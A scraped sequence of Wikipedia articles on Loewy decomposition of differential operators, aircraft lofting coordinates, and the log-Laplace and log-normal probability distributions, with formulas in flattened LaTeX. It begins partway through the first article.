The ideal generated by L {\displaystyle L} has the representation ⟨ L ⟩ = Lclm ( L x 2 ( L ) , L y 2 ( L ) ) {\displaystyle \langle L\rangle =\operatorname {Lclm} {\big (}\mathbb {L} _{x^{2}}(L),\mathbb {L} _{y^{2}}(L){\big )}} , i.e. it is completely reducible; its decomposition type is L x y 4 {\displaystyle {\mathcal {L}}_{xy}^{4}} . Therefore, the equation L z = 0 {\displaystyle Lz=0} has the differential fundamental system z 1 ( x , y ) = 2 ( x − y ) F ( y ) + ( x − y ) 2 F ′ ( y ) {\displaystyle z_{1}(x,y)=2(x-y)F(y)+(x-y)^{2}F'(y)} and z 2 ( x , y ) = 2 ( y − x ) G ( x ) + ( y − x ) 2 G ′ ( x ) . {\displaystyle z_{2}(x,y)=2(y-x)G(x)+(y-x)^{2}G'(x).}
It turns out that operators of higher order have more complicated decompositions and there are more alternatives, many of them in terms of non-principal divisors. The solutions of the corresponding equations get more complex. For equations of order three in the plane a fairly complete answer may be found in. [ 2 ] A typical example of a third-order equation that is also of historical interest is due to Blumberg. [ 14 ]
Example 7 (Blumberg 1912)
In his dissertation Blumberg considered the third order operator
L ≡ ∂ x x x + x ∂ x x y + 2 ∂ x x + 2 ( x + 1 ) ∂ x y + ∂ x + ( x + 2 ) ∂ y . {\displaystyle L\equiv \partial _{xxx}+x\partial _{xxy}+2\partial _{xx}+2(x+1)\partial _{xy}+\partial _{x}+(x+2)\partial _{y}.}
It allows the two first-order factors l 1 ≡ ∂ x + 1 {\displaystyle l_{1}\equiv \partial _{x}+1} and l 2 ≡ ∂ x + x ∂ y {\displaystyle l_{2}\equiv \partial _{x}+x\partial _{y}} . Their intersection is not principal; defining
L 1 ≡ ∂ x x x − x 2 ∂ x y y + 3 ∂ x x + ( 2 x + 3 ) ∂ x y − x 2 ∂ y y + 2 ∂ x + ( 2 x + 3 ) ∂ y {\displaystyle L_{1}\equiv \partial _{xxx}-x^{2}\partial _{xyy}+3\partial _{xx}+(2x+3)\partial _{xy}-x^{2}\partial _{yy}+2\partial _{x}+(2x+3)\partial _{y}} L 2 ≡ ∂ x x y + x ∂ x y y − 1 x ∂ x x − 1 x ∂ x y + x ∂ y y − 1 x ∂ x − ( 1 + 1 x ) ∂ y ⟩ ⟩ . {\displaystyle L_{2}\equiv \partial _{xxy}+x\partial _{xyy}-{\frac {1}{x}}\partial _{xx}-{\frac {1}{x}}\partial _{xy}+x\partial _{y}y-{\frac {1}{x}}\partial _{x}-\left(1+{\frac {1}{x}}\right)\partial _{y}{{\big \rangle }{\big \rangle }}.}
it may be written as Lclm ( l 2 , l 1 ) = ⟨ ⟨ L 1 , L 2 ⟩ ⟩ {\displaystyle \operatorname {Lclm} (l_{2},l_{1})={\langle \langle }L_{1},L_{2}{\rangle \rangle }} . Consequently, the Loewy decomposition of Blumbergs's operator is L = ( 1 x 0 ∂ x + 1 + 1 x ) ( L 1 L 2 ) . {\displaystyle L={\begin{pmatrix}1&x\\0&\partial _{x}+1+{\frac {1}{x}}\end{pmatrix}}{\begin{pmatrix}L_{1}\\L_{2}\end{pmatrix}}.}
It yields the following differential fundamental system for the differential equation L z = 0 {\displaystyle Lz=0} .
F , G {\displaystyle F,G} and H {\displaystyle H} are an undetermined functions.
Factorizations and Loewy decompositions turned out to be an extremely useful method for determining solutions of linear differential equations in closed form, both for ordinary and partial equations. It should be possible to generalize these methods to equations of higher order, equations in more variables and system of differential equations. | https://en.wikipedia.org/wiki/Loewy_decomposition |
Lofting coordinates are used for aircraft body measurements. The system derives from the one that was used in the shipbuilding lofting process, with longitudinal axis labeled as "stations" (usually fuselage stations , frame stations , FS ), transverse axis as "buttocks lines" (or butt lines , BL ), and vertical axis as " waterlines " (WL). The lofting coordinate frame is similar, but not the same as aircraft principal axes used to describe the aircraft flight. For the US-manufactured aircraft the ticks on the axes are labeled in inches , [ 1 ] (for example, WL 100 is 100 inches above the base waterline).
Fuselage stations are traditionally nonnegative, thus the origin is located at the nose of the plane or, sometimes, ahead of it. When compared to the coordinates used for aeromechanics , the fuselage stations are measured in the opposite direction than the ticks on the x-axis (and might not be aligned at all, if the wind-aligned coordinate system is used to describe the flight). [ 1 ] Some manufacturers use the designation "body stations", with the corresponding abbreviation BS. [ 2 ]
Per the US Air Force Airframe Maintenance and Repair Manual (1960), a horizontal waterline extends from the nose cone of the aircraft to the exhaust cone . The base line of the aircraft is designated as waterline 0 (zero). The location of this base line varies on different types of aircraft. However. the planes of all waterlines above and below the zero waterline are parallel. [ 3 ] The waterline number (WL or W.L.) in the US is expressed in inches , values increase upwards. Two typical alignments for the base line are the tip of the nose (negative WL are possible) or the "nominal ground plane" (measurements will be nonnegative). [ 4 ]
Butt line ticks increase to the right of the pilot with the origin at the centerline . When compared to the ( right-handed ) aeromechanics coordinate systems, the direction of the butt line is opposite to the y-axis. [ 1 ]
Many other reference points are used, especially on a large aircraft: [ 2 ] | https://en.wikipedia.org/wiki/Lofting_coordinates |
In probability theory and statistics , the log-Laplace distribution is the probability distribution of a random variable whose logarithm has a Laplace distribution . If X has a Laplace distribution with parameters μ and b , then Y = e X has a log-Laplace distribution. The distributional properties can be derived from the Laplace distribution.
A random variable has a log-Laplace( μ , b ) distribution if its probability density function is: [ 1 ]
The cumulative distribution function for Y when y > 0, is
Versions of the log-Laplace distribution based on an asymmetric Laplace distribution also exist. [ 2 ] Depending on the parameters, including asymmetry, the log-Laplace may or may not have a finite mean and a finite variance . [ 2 ]
This probability -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Log-Laplace_distribution |
μ = ln E [ X ] − 1 2 ln ( Var [ X ] E [ X ] 2 + 1 ) , {\displaystyle \mu =\ln \operatorname {E} [X]-{\frac {1}{2}}\ln \left({\frac {\operatorname {Var} [X]}{\operatorname {E} [X]^{2}}}+1\right),}
In probability theory , a log-normal (or lognormal ) distribution is a continuous probability distribution of a random variable whose logarithm is normally distributed . Thus, if the random variable X is log-normally distributed, then Y = ln X has a normal distribution. [ 2 ] [ 3 ] Equivalently, if Y has a normal distribution, then the exponential function of Y , X = exp( Y ) , has a log-normal distribution. A random variable which is log-normally distributed takes only positive real values. It is a convenient and useful model for measurements in exact and engineering sciences, as well as medicine , economics and other topics (e.g., energies, concentrations, lengths, prices of financial instruments, and other metrics).
The distribution is occasionally referred to as the Galton distribution or Galton's distribution , after Francis Galton . [ 4 ] The log-normal distribution has also been associated with other names, such as McAlister , Gibrat and Cobb–Douglas . [ 4 ]
A log-normal process is the statistical realization of the multiplicative product of many independent random variables , each of which is positive. This is justified by considering the central limit theorem in the log domain (sometimes called Gibrat's law ). The log-normal distribution is the maximum entropy probability distribution for a random variate X —for which the mean and variance of ln X are specified. [ 5 ]
Let Z {\displaystyle Z} be a standard normal variable , and let μ {\displaystyle \mu } and σ {\displaystyle \sigma } be two real numbers, with σ > 0 {\displaystyle \sigma >0} . Then, the distribution of the random variable
X = e μ + σ Z {\displaystyle X=e^{\mu +\sigma Z}}
is called the log-normal distribution with parameters μ {\displaystyle \mu } and σ {\displaystyle \sigma } . These are the expected value (or mean ) and standard deviation of the variable's natural logarithm , ln X {\displaystyle \ln X} , not the expectation and standard deviation of X {\displaystyle X} itself.
This relationship is true regardless of the base of the logarithmic or exponential function: If log a X {\displaystyle \log _{a}X} is normally distributed, then so is log b X {\displaystyle \log _{b}X} for any two positive numbers a , b ≠ 1 {\displaystyle a,b\neq 1} . Likewise, if e Y {\displaystyle e^{Y}} is log-normally distributed, then so is a Y {\displaystyle a^{Y}} , where 0 < a ≠ 1 {\displaystyle 0<a\neq 1} .
In order to produce a distribution with desired mean μ X {\displaystyle \mu _{X}} and variance σ X 2 {\displaystyle \sigma _{X}^{2}} , one uses μ = ln μ X 2 μ X 2 + σ X 2 {\displaystyle \mu =\ln {\frac {\mu _{X}^{2}}{\sqrt {\mu _{X}^{2}+\sigma _{X}^{2}}}}} and σ 2 = ln ( 1 + σ X 2 μ X 2 ) {\displaystyle \sigma ^{2}=\ln \left(1+{\frac {\sigma _{X}^{2}}{\mu _{X}^{2}}}\right)} .
Alternatively, the "multiplicative" or "geometric" parameters μ ∗ = e μ {\displaystyle \mu ^{*}=e^{\mu }} and σ ∗ = e σ {\displaystyle \sigma ^{*}=e^{\sigma }} can be used. They have a more direct interpretation: μ ∗ {\displaystyle \mu ^{*}} is the median of the distribution, and σ ∗ {\displaystyle \sigma ^{*}} is useful for determining "scatter" intervals, see below.
A positive random variable X {\displaystyle X} is log-normally distributed (i.e., X ∼ Lognormal ( μ , σ 2 ) {\textstyle X\sim \operatorname {Lognormal} \left(\mu ,\sigma ^{2}\right)} ), if the natural logarithm of X {\displaystyle X} is normally distributed with mean μ {\displaystyle \mu } and variance σ 2 {\displaystyle \sigma ^{2}} :
ln X ∼ N ( μ , σ 2 ) {\displaystyle \ln X\sim {\mathcal {N}}(\mu ,\sigma ^{2})}
Let Φ {\displaystyle \Phi } and φ {\displaystyle \varphi } be respectively the cumulative probability distribution function and the probability density function of the N ( 0 , 1 ) {\displaystyle {\mathcal {N}}(0,1)} standard normal distribution, then we have that [ 2 ] [ 4 ] the probability density function of the log-normal distribution is given by:
f X ( x ) = d d x Pr X [ X ≤ x ] = d d x Pr X [ ln X ≤ ln x ] = d d x Φ ( ln x − μ σ ) = φ ( ln x − μ σ ) d d x ( ln x − μ σ ) = φ ( ln x − μ σ ) 1 σ x = 1 x σ 2 π exp ( − ( ln x − μ ) 2 2 σ 2 ) . {\displaystyle {\begin{aligned}f_{X}(x)&={\frac {d}{dx}}\Pr \nolimits _{X}\left[X\leq x\right]\\[6pt]&={\frac {d}{dx}}\Pr \nolimits _{X}\left[\ln X\leq \ln x\right]\\[6pt]&={\frac {d}{dx}}\Phi {\left({\frac {\ln x-\mu }{\sigma }}\right)}\\[6pt]&=\varphi {\left({\frac {\ln x-\mu }{\sigma }}\right)}{\frac {d}{dx}}\left({\frac {\ln x-\mu }{\sigma }}\right)\\[6pt]&=\varphi {\left({\frac {\ln x-\mu }{\sigma }}\right)}{\frac {1}{\sigma x}}\\[6pt]&={\frac {1}{x\sigma {\sqrt {2\pi }}}}\exp \left(-{\frac {(\ln x-\mu )^{2}}{2\sigma ^{2}}}\right)~.\end{aligned}}}
The cumulative distribution function is
F X ( x ) = Φ ( ln x − μ σ ) {\displaystyle F_{X}(x)=\Phi {\left({\frac {\ln x-\mu }{\sigma }}\right)}}
where Φ {\displaystyle \Phi } is the cumulative distribution function of the standard normal distribution (i.e., N ( 0 , 1 ) {\displaystyle \operatorname {\mathcal {N}} (0,1)} ).
This may also be expressed as follows: [ 2 ]
1 2 [ 1 + erf ( ln x − μ σ 2 ) ] = 1 2 erfc ( − ln x − μ σ 2 ) {\displaystyle {\frac {1}{2}}\left[1+\operatorname {erf} \left({\frac {\ln x-\mu }{\sigma {\sqrt {2}}}}\right)\right]={\frac {1}{2}}\operatorname {erfc} \left(-{\frac {\ln x-\mu }{\sigma {\sqrt {2}}}}\right)}
where erfc is the complementary error function .
If X ∼ N ( μ , Σ ) {\displaystyle {\boldsymbol {X}}\sim {\mathcal {N}}({\boldsymbol {\mu }},\,{\boldsymbol {\Sigma }})} is a multivariate normal distribution , then Y i = exp ( X i ) {\displaystyle Y_{i}=\exp(X_{i})} has a multivariate log-normal distribution. [ 6 ] [ 7 ] The exponential is applied element-wise to the random vector X {\displaystyle {\boldsymbol {X}}} . The mean of Y {\displaystyle {\boldsymbol {Y}}} is
E [ Y ] i = e μ i + 1 2 Σ i i , {\displaystyle \operatorname {E} [{\boldsymbol {Y}}]_{i}=e^{\mu _{i}+{\frac {1}{2}}\Sigma _{ii}},}
and its covariance matrix is
Var [ Y ] i j = e μ i + μ j + 1 2 ( Σ i i + Σ j j ) ( e Σ i j − 1 ) . {\displaystyle \operatorname {Var} [{\boldsymbol {Y}}]_{ij}=e^{\mu _{i}+\mu _{j}+{\frac {1}{2}}(\Sigma _{ii}+\Sigma _{jj})}\left(e^{\Sigma _{ij}}-1\right).}
Since the multivariate log-normal distribution is not widely used, the rest of this entry only deals with the univariate distribution .
All moments of the log-normal distribution exist and
E [ X n ] = e n μ + n 2 σ 2 / 2 {\displaystyle \operatorname {E} [X^{n}]=e^{n\mu +n^{2}\sigma ^{2}/2}}
This can be derived by letting z = ln x − μ σ − n σ {\textstyle z={\tfrac {\ln x-\mu }{\sigma }}-n\sigma } within the integral. However, the log-normal distribution is not determined by its moments. [ 8 ] This implies that it cannot have a defined moment generating function in a neighborhood of zero. [ 9 ] Indeed, the expected value E [ e t X ] {\displaystyle \operatorname {E} [e^{tX}]} is not defined for any positive value of the argument t {\displaystyle t} , since the defining integral diverges.
The characteristic function E [ e i t X ] {\displaystyle \operatorname {E} [e^{itX}]} is defined for real values of t , but is not defined for any complex value of t that has a negative imaginary part, and hence the characteristic function is not analytic at the origin. Consequently, the characteristic function of the log-normal distribution cannot be represented as an infinite convergent series. [ 10 ] In particular, its Taylor formal series diverges:
∑ n = 0 ∞ ( i t ) n n ! e n μ + n 2 σ 2 / 2 {\displaystyle \sum _{n=0}^{\infty }{\frac {{\left(it\right)}^{n}}{n!}}e^{n\mu +n^{2}\sigma ^{2}/2}}
However, a number of alternative divergent series representations have been obtained. [ 10 ] [ 11 ] [ 12 ] [ 13 ]
A closed-form formula for the characteristic function φ ( t ) {\displaystyle \varphi (t)} with t {\displaystyle t} in the domain of convergence is not known. A relatively simple approximating formula is available in closed form, and is given by [ 14 ]
φ ( t ) ≈ exp ( − W 2 ( − i t σ 2 e μ ) + 2 W ( − i t σ 2 e μ ) 2 σ 2 ) 1 + W ( − i t σ 2 e μ ) {\displaystyle \varphi (t)\approx {\frac {\exp \left(-{\frac {W^{2}(-it\sigma ^{2}e^{\mu })+2W(-it\sigma ^{2}e^{\mu })}{2\sigma ^{2}}}\right)}{\sqrt {1+W{\left(-it\sigma ^{2}e^{\mu }\right)}}}}}
where W {\displaystyle W} is the Lambert W function . This approximation is derived via an asymptotic method, but it stays sharp all over the domain of convergence of φ {\displaystyle \varphi } .
The probability content of a log-normal distribution in any arbitrary domain can be computed to desired precision by first transforming the variable to normal, then numerically integrating using the ray-trace method. [ 15 ] ( Matlab code )
Since the probability of a log-normal can be computed in any domain, this means that the cdf (and consequently pdf and inverse cdf) of any function of a log-normal variable can also be computed. [ 15 ] ( Matlab code )
The geometric or multiplicative mean of the log-normal distribution is GM [ X ] = e μ = μ ∗ {\displaystyle \operatorname {GM} [X]=e^{\mu }=\mu ^{*}} . It equals the median. The geometric or multiplicative standard deviation is GSD [ X ] = e σ = σ ∗ {\displaystyle \operatorname {GSD} [X]=e^{\sigma }=\sigma ^{*}} . [ 16 ] [ 17 ]
By analogy with the arithmetic statistics, one can define a geometric variance, GVar [ X ] = e σ 2 {\displaystyle \operatorname {GVar} [X]=e^{\sigma ^{2}}} , and a geometric coefficient of variation , [ 16 ] GCV [ X ] = e σ − 1 {\displaystyle \operatorname {GCV} [X]=e^{\sigma }-1} , has been proposed. This term was intended to be analogous to the coefficient of variation, for describing multiplicative variation in log-normal data, but this definition of GCV has no theoretical basis as an estimate of CV {\displaystyle \operatorname {CV} } itself (see also Coefficient of variation ).
Note that the geometric mean is smaller than the arithmetic mean. This is due to the AM–GM inequality and is a consequence of the logarithm being a concave function . In fact, [ 18 ]
E [ X ] = e μ + 1 2 σ 2 = e μ ⋅ e σ 2 = GM [ X ] ⋅ GVar [ X ] . {\displaystyle \operatorname {E} [X]=e^{\mu +{\frac {1}{2}}\sigma ^{2}}=e^{\mu }\cdot {\sqrt {e^{\sigma ^{2}}}}=\operatorname {GM} [X]\cdot {\sqrt {\operatorname {GVar} [X]}}.}
In finance, the term e − σ 2 / 2 {\displaystyle e^{-\sigma ^{2}/2}} is sometimes interpreted as a convexity correction . From the point of view of stochastic calculus , this is the same correction term as in Itō's lemma for geometric Brownian motion .
For any real or complex number n , the n -th moment of a log-normally distributed variable X is given by [ 4 ] E [ X n ] = e n μ + 1 2 n 2 σ 2 . {\displaystyle \operatorname {E} [X^{n}]=e^{n\mu +{\frac {1}{2}}n^{2}\sigma ^{2}}.}
Specifically, the arithmetic mean, expected square, arithmetic variance, and arithmetic standard deviation of a log-normally distributed variable X are respectively given by: [ 2 ]
E [ X ] = e μ + 1 2 σ 2 , E [ X 2 ] = e 2 μ + 2 σ 2 , Var [ X ] = E [ X 2 ] − E [ X ] 2 = ( E [ X ] ) 2 ( e σ 2 − 1 ) = e 2 μ + σ 2 ( e σ 2 − 1 ) , SD [ X ] = Var [ X ] = E [ X ] e σ 2 − 1 = e μ + 1 2 σ 2 e σ 2 − 1 , {\displaystyle {\begin{aligned}\operatorname {E} [X]&=e^{\mu +{\tfrac {1}{2}}\sigma ^{2}},\\[4pt]\operatorname {E} [X^{2}]&=e^{2\mu +2\sigma ^{2}},\\[4pt]\operatorname {Var} [X]&=\operatorname {E} [X^{2}]-\operatorname {E} [X]^{2}={\left(\operatorname {E} [X]\right)}^{2}\left(e^{\sigma ^{2}}-1\right)\\[2pt]&=e^{2\mu +\sigma ^{2}}\left(e^{\sigma ^{2}}-1\right),\\[4pt]\operatorname {SD} [X]&={\sqrt {\operatorname {Var} [X]}}=\operatorname {E} [X]{\sqrt {e^{\sigma ^{2}}-1}}\\[2pt]&=e^{\mu +{\tfrac {1}{2}}\sigma ^{2}}{\sqrt {e^{\sigma ^{2}}-1}},\end{aligned}}}
The arithmetic coefficient of variation CV [ X ] {\displaystyle \operatorname {CV} [X]} is the ratio SD [ X ] E [ X ] {\displaystyle {\tfrac {\operatorname {SD} [X]}{\operatorname {E} [X]}}} . For a log-normal distribution it is equal to [ 3 ] CV [ X ] = e σ 2 − 1 . {\displaystyle \operatorname {CV} [X]={\sqrt {e^{\sigma ^{2}}-1}}.} This estimate is sometimes referred to as the "geometric CV" (GCV), [ 19 ] [ 20 ] due to its use of the geometric variance. Contrary to the arithmetic standard deviation, the arithmetic coefficient of variation is independent of the arithmetic mean.
The parameters μ and σ can be obtained, if the arithmetic mean and the arithmetic variance are known:
μ = ln E [ X ] 2 E [ X 2 ] = ln E [ X ] 2 Var [ X ] + E [ X ] 2 , σ 2 = ln E [ X 2 ] E [ X ] 2 = ln ( 1 + Var [ X ] E [ X ] 2 ) . {\displaystyle {\begin{aligned}\mu &=\ln {\frac {\operatorname {E} [X]^{2}}{\sqrt {\operatorname {E} [X^{2}]}}}=\ln {\frac {\operatorname {E} [X]^{2}}{\sqrt {\operatorname {Var} [X]+\operatorname {E} [X]^{2}}}},\\[1ex]\sigma ^{2}&=\ln {\frac {\operatorname {E} [X^{2}]}{\operatorname {E} [X]^{2}}}=\ln \left(1+{\frac {\operatorname {Var} [X]}{\operatorname {E} [X]^{2}}}\right).\end{aligned}}}
A probability distribution is not uniquely determined by the moments E[ X n ] = e nμ + 1 / 2 n 2 σ 2 for n ≥ 1 . That is, there exist other distributions with the same set of moments. [ 4 ] In fact, there is a whole family of distributions with the same moments as the log-normal distribution. [ citation needed ]
The mode is the point of global maximum of the probability density function. In particular, by solving the equation ( ln f ) ′ = 0 {\displaystyle (\ln f)'=0} , we get that:
Mode [ X ] = e μ − σ 2 . {\displaystyle \operatorname {Mode} [X]=e^{\mu -\sigma ^{2}}.}
Since the log-transformed variable Y = ln X {\displaystyle Y=\ln X} has a normal distribution, and quantiles are preserved under monotonic transformations, the quantiles of X {\displaystyle X} are
q X ( α ) = exp [ μ + σ q Φ ( α ) ] = μ ∗ ( σ ∗ ) q Φ ( α ) , {\displaystyle q_{X}(\alpha )=\exp \left[\mu +\sigma q_{\Phi }(\alpha )\right]=\mu ^{*}(\sigma ^{*})^{q_{\Phi }(\alpha )},}
where q Φ ( α ) {\displaystyle q_{\Phi }(\alpha )} is the quantile of the standard normal distribution.
Specifically, the median of a log-normal distribution is equal to its multiplicative mean, [ 21 ]
Med [ X ] = e μ = μ ∗ . {\displaystyle \operatorname {Med} [X]=e^{\mu }=\mu ^{*}~.}
The partial expectation of a random variable X {\displaystyle X} with respect to a threshold k {\displaystyle k} is defined as
g ( k ) = ∫ k ∞ x f X ( x ∣ X > k ) d x . {\displaystyle g(k)=\int _{k}^{\infty }x\,f_{X}(x\mid X>k)\,dx.}
Alternatively, by using the definition of conditional expectation , it can be written as g ( k ) = E [ X ∣ X > k ] Pr ( X > k ) {\displaystyle g(k)=\operatorname {E} [X\mid X>k]\Pr(X>k)} . For a log-normal random variable, the partial expectation is given by:
g ( k ) = ∫ k ∞ x f X ( x ∣ X > k ) d x = e μ + 1 2 σ 2 Φ ( μ − ln k σ − σ ) {\displaystyle {\begin{aligned}g(k)&=\int _{k}^{\infty }xf_{X}(x\mid X>k)\,dx\\[1ex]&=e^{\mu +{\tfrac {1}{2}}\sigma ^{2}}\,\Phi {\left({\frac {\mu -\ln k}{\sigma }}-\sigma \right)}\end{aligned}}}
where Φ {\displaystyle \Phi } is the normal cumulative distribution function . The derivation of the formula is provided in the Talk page . The partial expectation formula has applications in insurance and economics , it is used in solving the partial differential equation leading to the Black–Scholes formula .
The conditional expectation of a log-normal random variable X {\displaystyle X} —with respect to a threshold k {\displaystyle k} —is its partial expectation divided by the cumulative probability of being in that range:
E [ X ∣ X < k ] = e μ + σ 2 2 ⋅ Φ [ ln k − μ σ − σ ] Φ [ ln k − μ σ ] E [ X ∣ X ≥ k ] = e μ + σ 2 2 ⋅ Φ [ μ − ln k σ + σ ] 1 − Φ [ ln k − μ σ ] E [ X ∣ X ∈ [ k 1 , k 2 ] ] = e μ + σ 2 2 ⋅ Φ [ ln k 2 − μ σ − σ ] − Φ [ ln k 1 − μ σ − σ ] Φ [ ln k 2 − μ σ ] − Φ [ ln k 1 − μ σ ] {\displaystyle {\begin{aligned}\operatorname {E} [X\mid X<k]&=e^{\mu +{\frac {\sigma ^{2}}{2}}}\cdot {\frac {\Phi {\left[{\frac {\ln k-\mu }{\sigma }}-\sigma \right]}}{\Phi {\left[{\frac {\ln k-\mu }{\sigma }}\right]}}}\\[8pt]\operatorname {E} [X\mid X\geq k]&=e^{\mu +{\frac {\sigma ^{2}}{2}}}\cdot {\frac {\Phi {\left[{\frac {\mu -\ln k}{\sigma }}+\sigma \right]}}{1-\Phi {\left[{\frac {\ln k-\mu }{\sigma }}\right]}}}\\[8pt]\operatorname {E} [X\mid X\in [k_{1},k_{2}]]&=e^{\mu +{\frac {\sigma ^{2}}{2}}}\cdot {\frac {\Phi {\left[{\frac {\ln k_{2}-\mu }{\sigma }}-\sigma \right]}-\Phi {\left[{\frac {\ln k_{1}-\mu }{\sigma }}-\sigma \right]}}{\Phi \left[{\frac {\ln k_{2}-\mu }{\sigma }}\right]-\Phi \left[{\frac {\ln k_{1}-\mu }{\sigma }}\right]}}\end{aligned}}}
In addition to the characterization by μ , σ {\displaystyle \mu ,\sigma } or μ ∗ , σ ∗ {\displaystyle \mu ^{*},\sigma ^{*}} , here are multiple ways how the log-normal distribution can be parameterized. ProbOnto , the knowledge base and ontology of probability distributions [ 22 ] [ 23 ] lists seven such forms:
Consider the situation when one would like to run a model using two different optimal design tools, for example PFIM [ 28 ] and PopED. [ 29 ] The former supports the LN2, the latter LN7 parameterization, respectively. Therefore, the re-parameterization is required, otherwise the two tools would produce different results.
For the transition LN2 ( μ , v ) → LN7 ( μ N , σ N ) {\displaystyle \operatorname {LN2} (\mu ,v)\to \operatorname {LN7} (\mu _{N},\sigma _{N})} following formulas hold μ N = exp ( μ + v / 2 ) {\textstyle \mu _{N}=\exp(\mu +v/2)} and σ N = exp ( μ + v / 2 ) exp ( v ) − 1 {\textstyle \sigma _{N}=\exp(\mu +v/2){\sqrt {\exp(v)-1}}} .
For the transition LN7 ( μ N , σ N ) → LN2 ( μ , v ) {\displaystyle \operatorname {LN7} (\mu _{N},\sigma _{N})\to \operatorname {LN2} (\mu ,v)} following formulas hold μ = ln μ N − 1 2 v {\textstyle \mu =\ln \mu _{N}-{\frac {1}{2}}v} and v = ln ( 1 + σ N 2 / μ N 2 ) {\textstyle v=\ln(1+\sigma _{N}^{2}/\mu _{N}^{2})} .
All remaining re-parameterisation formulas can be found in the specification document on the project website. [ 30 ]
If two independent , log-normal variables X 1 {\displaystyle X_{1}} and X 2 {\displaystyle X_{2}} are multiplied [divided], the product [ratio] is again log-normal, with parameters μ = μ 1 + μ 2 {\displaystyle \mu =\mu _{1}+\mu _{2}} [ μ = μ 1 − μ 2 {\displaystyle \mu =\mu _{1}-\mu _{2}} ] and σ {\displaystyle \sigma } , where σ 2 = σ 1 2 + σ 2 2 {\displaystyle \sigma ^{2}=\sigma _{1}^{2}+\sigma _{2}^{2}} .
More generally, if X j ∼ Lognormal ( μ j , σ j 2 ) {\displaystyle X_{j}\sim \operatorname {Lognormal} (\mu _{j},\sigma _{j}^{2})} are n {\displaystyle n} independent, log-normally distributed variables, then Y = ∏ j = 1 n X j ∼ Lognormal ( ∑ j = 1 n μ j , ∑ j = 1 n σ j 2 ) . {\textstyle Y=\prod _{j=1}^{n}X_{j}\sim \operatorname {Lognormal} {\Big (}\sum _{j=1}^{n}\mu _{j},\sum _{j=1}^{n}\sigma _{j}^{2}{\Big )}.}
The geometric or multiplicative mean of n {\displaystyle n} independent, identically distributed, positive random variables X i {\displaystyle X_{i}} shows, for n → ∞ {\displaystyle n\to \infty } , approximately a log-normal distribution with parameters μ = E [ ln X i ] {\displaystyle \mu =\operatorname {E} [\ln X_{i}]} and σ 2 = var [ ln X i ] / n {\displaystyle \sigma ^{2}=\operatorname {var} [\ln X_{i}]/n} , assuming σ 2 {\displaystyle \sigma ^{2}} is finite.
In fact, the random variables do not have to be identically distributed. It is enough for the distributions of ln X i {\displaystyle \ln X_{i}} to all have finite variance and satisfy the other conditions of any of the many variants of the central limit theorem .
This is commonly known as Gibrat's law .
Whether a Log-Normal can be considered or not a true heavy-tail distribution is still debated. The main reason is that its variance is always finite, differently from what happen with certain Pareto distributions, for instance. However a recent study has shown how it is possible to create a Log-Normal distribution with infinite variance using Robinson Non-Standard Analysis. [ 31 ]
A set of data that arises from the log-normal distribution has a symmetric Lorenz curve (see also Lorenz asymmetry coefficient ). [ 32 ]
The harmonic H {\displaystyle H} , geometric G {\displaystyle G} and arithmetic A {\displaystyle A} means of this distribution are related; [ 33 ] such relation is given by
H = G 2 A . {\displaystyle H={\frac {G^{2}}{A}}.}
Log-normal distributions are infinitely divisible , [ 34 ] but they are not stable distributions , which can be easily drawn from. [ 35 ]
For a more accurate approximation, one can use the Monte Carlo method to estimate the cumulative distribution function, the pdf and the right tail. [ 38 ] [ 39 ]
The sum of correlated log-normally distributed random variables can also be approximated by a log-normal distribution [ citation needed ] S + = E [ ∑ i X i ] = ∑ i E [ X i ] = ∑ i e μ i + σ i 2 / 2 σ Z 2 = 1 S + 2 ∑ i , j cor i j σ i σ j E [ X i ] E [ X j ] = 1 S + 2 ∑ i , j cor i j σ i σ j e μ i + σ i 2 / 2 e μ j + σ j 2 / 2 μ Z = ln S + − σ Z 2 / 2 {\displaystyle {\begin{aligned}S_{+}&=\operatorname {E} \left[\sum _{i}X_{i}\right]=\sum _{i}\operatorname {E} [X_{i}]=\sum _{i}e^{\mu _{i}+\sigma _{i}^{2}/2}\\[2ex]\sigma _{Z}^{2}&={\frac {1}{S_{+}^{2}}}\,\sum _{i,j}\operatorname {cor} _{ij}\sigma _{i}\sigma _{j}\operatorname {E} [X_{i}]\operatorname {E} [X_{j}]\\[1ex]&={\frac {1}{S_{+}^{2}}}\,\sum _{i,j}\operatorname {cor} _{ij}\sigma _{i}\sigma _{j}e^{\mu _{i}+\sigma _{i}^{2}/2}e^{\mu _{j}+\sigma _{j}^{2}/2}\\[2ex]\mu _{Z}&=\ln S_{+}-\sigma _{Z}^{2}/2\end{aligned}}}
For determining the maximum likelihood estimators of the log-normal distribution parameters μ and σ , we can use the same procedure as for the normal distribution . Note that L ( μ , σ ) = ∏ i = 1 n 1 x i φ μ , σ ( ln x i ) , {\displaystyle L(\mu ,\sigma )=\prod _{i=1}^{n}{\frac {1}{x_{i}}}\varphi _{\mu ,\sigma }(\ln x_{i}),} where φ {\displaystyle \varphi } is the density function of the normal distribution N ( μ , σ 2 ) {\displaystyle {\mathcal {N}}(\mu ,\sigma ^{2})} . Therefore, the log-likelihood function is ℓ ( μ , σ ∣ x 1 , x 2 , … , x n ) = − ∑ i ln x i + ℓ N ( μ , σ ∣ ln x 1 , ln x 2 , … , ln x n ) . {\displaystyle \ell (\mu ,\sigma \mid x_{1},x_{2},\ldots ,x_{n})=-\sum _{i}\ln x_{i}+\ell _{N}(\mu ,\sigma \mid \ln x_{1},\ln x_{2},\dots ,\ln x_{n}).}
Since the first term is constant with regard to μ and σ , both logarithmic likelihood functions, ℓ {\displaystyle \ell } and ℓ N {\displaystyle \ell _{N}} , reach their maximum with the same μ {\displaystyle \mu } and σ {\displaystyle \sigma } . Hence, the maximum likelihood estimators are identical to those for a normal distribution for the observations ln x 1 , ln x 2 , … , ln x n ) {\displaystyle \ln x_{1},\ln x_{2},\dots ,\ln x_{n})} , μ ^ = ∑ i ln x i n , σ ^ 2 = ∑ i ( ln x i − μ ^ ) 2 n . {\displaystyle {\widehat {\mu }}={\frac {\sum _{i}\ln x_{i}}{n}},\qquad {\widehat {\sigma }}^{2}={\frac {\sum _{i}{\left(\ln x_{i}-{\widehat {\mu }}\right)}^{2}}{n}}.}
For finite n , the estimator for μ {\displaystyle \mu } is unbiased, but the one for σ {\displaystyle \sigma } is biased. As for the normal distribution, an unbiased estimator for σ {\displaystyle \sigma } can be obtained by replacing the denominator n by n −1 in the equation for σ ^ 2 {\displaystyle {\widehat {\sigma }}^{2}} .
